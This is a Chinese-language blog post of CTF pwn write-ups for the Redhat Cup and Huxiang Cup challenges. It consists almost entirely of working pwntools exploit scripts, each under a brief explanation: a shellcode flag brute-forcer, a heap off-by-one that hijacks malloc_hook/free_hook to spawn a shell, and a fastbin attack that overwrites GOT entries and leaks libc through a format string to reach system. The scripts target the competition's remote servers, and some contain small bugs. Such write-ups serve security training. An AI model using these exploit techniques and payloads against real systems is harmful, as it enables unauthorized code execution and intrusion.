redhat_湖湘杯部分简单pwn 题

每个人都需要进步 我需要一步一步前进

红帽杯 pwn1

shellcode 对flag 一个一个爆破

#!/usr/bin/python2.7  # -*- coding: utf-8 -*-from pwn import *
# context.log_level = "debug"
context.arch = "amd64"

exe = './pwn'
elf = ELF(exe)

#------------------------------------def d(s = ''):
        gdb.attach(p ,s)

def exp(idx, size):
        flag_addr = 0x080F6CA0
        lists_addr = 0x080F6C80
        name_addr = 0x080F6CC0
        # 33 - 126
        p.sendlineafter('Give me a index:\n', str(idx))
        p.sendafter('Three is good number,I like it very much!\n','\x52\x58\xC3')
        p.sendlineafter('Leave you name of size:\n', str(size))
        p.sendlineafter('Tell me:\n', 'A'*(size-1))
        sleep(0.3)
        re = p.recv()
        p.close()
        return re

#-------------------------------------# 33if __name__ == '__main__':
        lists = "0123456789abcdefghijklmnopqrstuvwxyz!_{}"
        flag = ''
        for idx in range(0,33):
                # for i in range(90,127):
                for i in lists:
                        #io = elf.process()
                        p = remote('47.104.190.38', 12001)
                        print(idx)
                        print(i)
                        # x = i
                        x = int(ord(i))
                        ret = exp(idx, (x+1))
                        if '1' in ret:
                                flag += chr(x)
                                print('----------')
                                print(flag)
                                print('-----------')
                                break


#flag{1f8e093b45bbb8f4b14478b253}

湖湘杯pwn1

strlen 造成 off_by_one
直接覆盖 malloc_hook ---> malloc_hook+8 然写shellcode

#!/usr/bin/python2.7  # -*- coding: utf-8 -*-from pwn import *
context.log_level = "debug"
context.arch = "amd64"
exe = './HackNote'
elf = ELF(exe)

#------------------------------------def d(s = ''):
        gdb.attach(p ,s)

def menu(idx):
        p.sendlineafter("-----------------", str(idx))

def add(size,content):
        menu(1)
        p.sendlineafter('Size:\n', str(size))
        p.sendafter('Note:\n', content)


def edit(idx, content):
        menu(3)
        p.sendlineafter('Index of Note:\n', str(idx))
        p.sendafter('Note:\n',content)

def delete(idx):
        menu(2)
        p.sendlineafter('Index of Note:\n', str(idx))


def pwn():
        malloc_hook = 0x6CA788
        lists = 0x6CBC40
        fake_size = 0x42  # 0x6ca778 - 6
        free_hook = 0x6CC988
        add(0x88,'A' * 0x88)
        add(0x88,'A' * 0x88)
        add(0x88,'A' * 0x88)
        add(0x88,'A' * 0x88)
        add(0x88,'A' * 0x88)
        add(0x68,asm(shellcraft.sh()).ljust(0x68,'A'))
        edit(3,'A' * 0x88)

        payload = 'a' * 8 + p64(0x81)
        payload += p64(0x6CBC40) + p64(0x6CBC40 + 0x8)
        payload = payload.ljust(0x80,'a')
        payload += p64(0x80)
        payload += '\x90'
        edit(3,payload)
        delete(4)
        edit(3,p64(__free_hook) + '\n')
        payload = p64(free_hook + 8) + asm(shellcraft.sh()) + '\n'
        edit(0,payload)
        delete(3)

        p.interactive()
#-------------------------------------if __name__ == '__main__':
        l = 1
        if l:
                p = process(exe)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        else:
                p = remote('183.129.189.62', 15704)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

        pwn()
 

pwn2

在 delete 的时候 存在一个 chunk 地址的残留
我们可以 利用这个去实现我们想要的功能
两次修改 got 表
布置两个 fastbin attack 指向got表
第一次改 free 为 printf 利用格式化字符串 leak libc
第二次改 free 为 system 那到权限

#!/usr/bin/python2.7  # -*- coding: utf-8 -*-from pwn import *
context.log_level = "debug"
context.timeout = 0.1
context.arch = "amd64"

exe = './NameSystem'
elf = ELF(exe)

#------------------------------------def d(s = ''):
        gdb.attach(p ,s)

def menu(idx):
        p.sendlineafter("choice :", str(idx))
    
def add(size,content):
        menu(1)
        p.sendlineafter('Size:', str(size))
        p.sendafter('Name:', content)

def delete(idx):
        menu(3)
        p.sendlineafter(' delete:', str(idx))

def pwn():
        lists = 0x6020A0
        for i in range(20):
                add(0x30, '/bin/sh\x00\n')
        # d()
        for i in range(3):
                delete(0)

        delete(19)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(0)
        delete(7)
        delete(0)
        delete(7)
        add(0x30, p64(0x602008)+'\n')
        # d()
        for i in range(12):
                add(0x50 , p64(0x602000-6)+'\n')

        delete(8)
        delete(8)
        delete(19)
        delete(8)
        delete(19)
        delete(8)
        delete(8)
        delete(8)
        delete(14)
        delete(8)
        delete(12)
        add(0x50 , p64(0x602000-6)+'\n')
        add(0x30,p64(0x602008)+'\n')
        add(0x50, '%13$p\n')
        add(0x50, '\n')
        add(0x50, 'aaaaaa'+p64(0x41)+'\xd0\x06\x40'+'\x00\x00\n')
        delete(14)
        p.recvline()
        p.recvline()
        sleep(0.5)
        p.recvuntil('want to delete:')
        # success(p.recv())
        libc.address = int(p.recv(14),16) - 0x20830
        success('libc.address-->'+hex(libc.address))
        system_addr = libc.sym['system']
        success('system_addr-->'+hex(system_addr))
        add(0x30, '/bin/sh\x00\n')
        add(0x30, p64(system_addr)+p64(libc.sym['puts'])+'\n')
        delete(16)
        p.sendline('cat flag')

        p.interactive()
#-------------------------------------if __name__ == '__main__':
        l = 0
        if l:
                p = process(exe)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        else:
                p = remote('183.129.189.62', 10505)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


        pwn()
点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注